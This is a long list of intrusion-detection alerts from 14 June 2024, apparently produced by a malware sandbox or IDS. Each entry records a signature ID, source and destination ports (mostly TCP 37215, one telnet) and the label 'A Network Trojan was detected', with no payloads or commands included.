                Timestamp:06/14/24-10:44:04.420710
                SID:2829579
                Source Port:39166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422878
                SID:2829579
                Source Port:42496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002049
                SID:2829579
                Source Port:38648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411116
                SID:2835222
                Source Port:55558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882346
                SID:2829579
                Source Port:53836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915454
                SID:2829579
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185262
                SID:2829579
                Source Port:57724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850672
                SID:2835222
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020343
                SID:2829579
                Source Port:40052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979856
                SID:2829579
                Source Port:35016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199757
                SID:2829579
                Source Port:57210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253562
                SID:2829579
                Source Port:44088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878341
                SID:2829579
                Source Port:60066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069499
                SID:2835222
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071846
                SID:2835222
                Source Port:53712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724799
                SID:2835222
                Source Port:38440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518828
                SID:2829579
                Source Port:45238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666494
                SID:2835222
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813531
                SID:2829579
                Source Port:55528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563271
                SID:2835222
                Source Port:45704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275018
                SID:2829579
                Source Port:56628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670088
                SID:2829579
                Source Port:49686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968387
                SID:2829579
                Source Port:40090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989327
                SID:2829579
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618753
                SID:2829579
                Source Port:38766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182848
                SID:2829579
                Source Port:41332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989679
                SID:2835222
                Source Port:47708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019508
                SID:2835222
                Source Port:54330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979403
                SID:2829579
                Source Port:59124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985769
                SID:2835222
                Source Port:33104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808433
                SID:2829579
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965913
                SID:2829579
                Source Port:42958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763305
                SID:2829579
                Source Port:34484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274647
                SID:2835222
                Source Port:46972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243488
                SID:2835222
                Source Port:33470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000161
                SID:2829579
                Source Port:39092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338412
                SID:2829579
                Source Port:34504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411239
                SID:2835222
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704524
                SID:2835222
                Source Port:34602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021785
                SID:2829579
                Source Port:38900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340097
                SID:2829579
                Source Port:59422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807437
                SID:2835222
                Source Port:59222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504853
                SID:2829579
                Source Port:48052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969732
                SID:2829579
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879295
                SID:2835222
                Source Port:59546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275123
                SID:2835222
                Source Port:58064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726031
                SID:2829579
                Source Port:45620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847979
                SID:2829579
                Source Port:57450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423356
                SID:2835222
                Source Port:35086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827973
                SID:2835222
                Source Port:57176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075114
                SID:2835222
                Source Port:56332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661885
                SID:2835222
                Source Port:49176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967482
                SID:2835222
                Source Port:35238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182968
                SID:2829579
                Source Port:52744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151068
                SID:2829579
                Source Port:59802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031915
                SID:2835222
                Source Port:58360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678917
                SID:2829579
                Source Port:56876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143380
                SID:2829579
                Source Port:55276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164008
                SID:2829579
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760963
                SID:2829579
                Source Port:53042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672398
                SID:2829579
                Source Port:42528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846759
                SID:2835222
                Source Port:37278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.123479
                SID:2840515
                Source Port:47964
                Destination Port:23
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991209
                SID:2829579
                Source Port:43366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186090
                SID:2835222
                Source Port:45580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980080
                SID:2829579
                Source Port:34640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618059
                SID:2829579
                Source Port:53668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135172
                SID:2835222
                Source Port:36626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408150
                SID:2829579
                Source Port:55162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014527
                SID:2829579
                Source Port:55248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722132
                SID:2829579
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453930
                SID:2829579
                Source Port:38380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967516
                SID:2829579
                Source Port:40630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295004
                SID:2835222
                Source Port:34628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860557
                SID:2829579
                Source Port:47756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916392
                SID:2835222
                Source Port:59204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337828
                SID:2835222
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700089
                SID:2835222
                Source Port:33598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012090
                SID:2835222
                Source Port:43812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075242
                SID:2829579
                Source Port:60682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001273
                SID:2835222
                Source Port:46960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879182
                SID:2835222
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383378
                SID:2829579
                Source Port:44224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502102
                SID:2829579
                Source Port:44498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906472
                SID:2829579
                Source Port:46748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021029
                SID:2829579
                Source Port:45526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408370
                SID:2835222
                Source Port:44348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411044
                SID:2829579
                Source Port:49856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504379
                SID:2829579
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407515
                SID:2835222
                Source Port:57756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227592
                SID:2829579
                Source Port:34044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829432
                SID:2835222
                Source Port:37380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760999
                SID:2829579
                Source Port:50658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966127
                SID:2829579
                Source Port:38678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225348
                SID:2829579
                Source Port:41328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831312
                SID:2835222
                Source Port:48982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985305
                SID:2829579
                Source Port:56028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000189
                SID:2835222
                Source Port:60468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410980
                SID:2829579
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542708
                SID:2829579
                Source Port:51290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.070683
                SID:2829579
                Source Port:47194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032401
                SID:2835222
                Source Port:38754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520321
                SID:2829579
                Source Port:51478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944276
                SID:2829579
                Source Port:40550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881391
                SID:2835222
                Source Port:60168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180722
                SID:2835222
                Source Port:32860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245984
                SID:2829579
                Source Port:58190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980725
                SID:2835222
                Source Port:36308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944731
                SID:2829579
                Source Port:42638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967310
                SID:2835222
                Source Port:38122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774954
                SID:2835222
                Source Port:33220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183506
                SID:2835222
                Source Port:55892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010392
                SID:2835222
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051814
                SID:2835222
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421174
                SID:2829579
                Source Port:59122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942282
                SID:2835222
                Source Port:36952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772428
                SID:2829579
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364549
                SID:2835222
                Source Port:52782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727456
                SID:2835222
                Source Port:56074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092319
                SID:2829579
                Source Port:51872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368414
                SID:2829579
                Source Port:47990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811871
                SID:2835222
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014982
                SID:2829579
                Source Port:50404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.683713
                SID:2829579
                Source Port:34826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.547197
                SID:2835222
                Source Port:39270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660644
                SID:2835222
                Source Port:44950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567265
                SID:2835222
                Source Port:36428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.976856
                SID:2829579
                Source Port:42996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024249
                SID:2835222
                Source Port:48754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024676
                SID:2835222
                Source Port:60288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684621
                SID:2835222
                Source Port:38036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967181
                SID:2835222
                Source Port:44768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181349
                SID:2835222
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646579
                SID:2835222
                Source Port:44290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849420
                SID:2835222
                Source Port:33686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253528
                SID:2829579
                Source Port:33990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944551
                SID:2829579
                Source Port:47172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027813
                SID:2835222
                Source Port:52148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027300
                SID:2835222
                Source Port:41924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202708
                SID:2835222
                Source Port:45624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847917
                SID:2835222
                Source Port:42192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615072
                SID:2829579
                Source Port:51852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763524
                SID:2829579
                Source Port:57542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614330
                SID:2829579
                Source Port:49148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942448
                SID:2829579
                Source Port:43084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289123
                SID:2835222
                Source Port:59008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700032
                SID:2829579
                Source Port:37020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343416
                SID:2835222
                Source Port:52138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295553
                SID:2829579
                Source Port:52834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663711
                SID:2835222
                Source Port:53860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031658
                SID:2835222
                Source Port:58518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761711
                SID:2829579
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616026
                SID:2829579
                Source Port:44764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877543
                SID:2835222
                Source Port:57844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762600
                SID:2835222
                Source Port:46870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858707
                SID:2835222
                Source Port:60922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245520
                SID:2835222
                Source Port:44962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.580628
                SID:2835222
                Source Port:43158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686757
                SID:2835222
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940933
                SID:2829579
                Source Port:53194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034018
                SID:2835222
                Source Port:35668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828948
                SID:2829579
                Source Port:37132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914437
                SID:2835222
                Source Port:35022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183114
                SID:2835222
                Source Port:50286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520498
                SID:2835222
                Source Port:36606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275199
                SID:2829579
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322288
                SID:2835222
                Source Port:55410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898385
                SID:2829579
                Source Port:35390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452061
                SID:2835222
                Source Port:56136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831115
                SID:2829579
                Source Port:40712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420898
                SID:2835222
                Source Port:36956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644333
                SID:2829579
                Source Port:39078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881825
                SID:2829579
                Source Port:51838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677827
                SID:2835222
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.161469
                SID:2829579
                Source Port:53510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115898
                SID:2835222
                Source Port:49762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325668
                SID:2835222
                Source Port:57602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765993
                SID:2835222
                Source Port:40420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185416
                SID:2829579
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879851
                SID:2829579
                Source Port:37790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881108
                SID:2835222
                Source Port:46966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471997
                SID:2829579
                Source Port:45642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018394
                SID:2829579
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276569
                SID:2835222
                Source Port:60138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992430
                SID:2829579
                Source Port:38976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791523
                SID:2835222
                Source Port:60016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011866
                SID:2829579
                Source Port:54722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916078
                SID:2829579
                Source Port:34514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290379
                SID:2835222
                Source Port:58888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502983
                SID:2835222
                Source Port:36180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424886
                SID:2835222
                Source Port:38248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180861
                SID:2829579
                Source Port:46306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023164
                SID:2835222
                Source Port:54590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288692
                SID:2829579
                Source Port:46378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969783
                SID:2835222
                Source Port:34354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344075
                SID:2835222
                Source Port:33690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548117
                SID:2835222
                Source Port:36134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830494
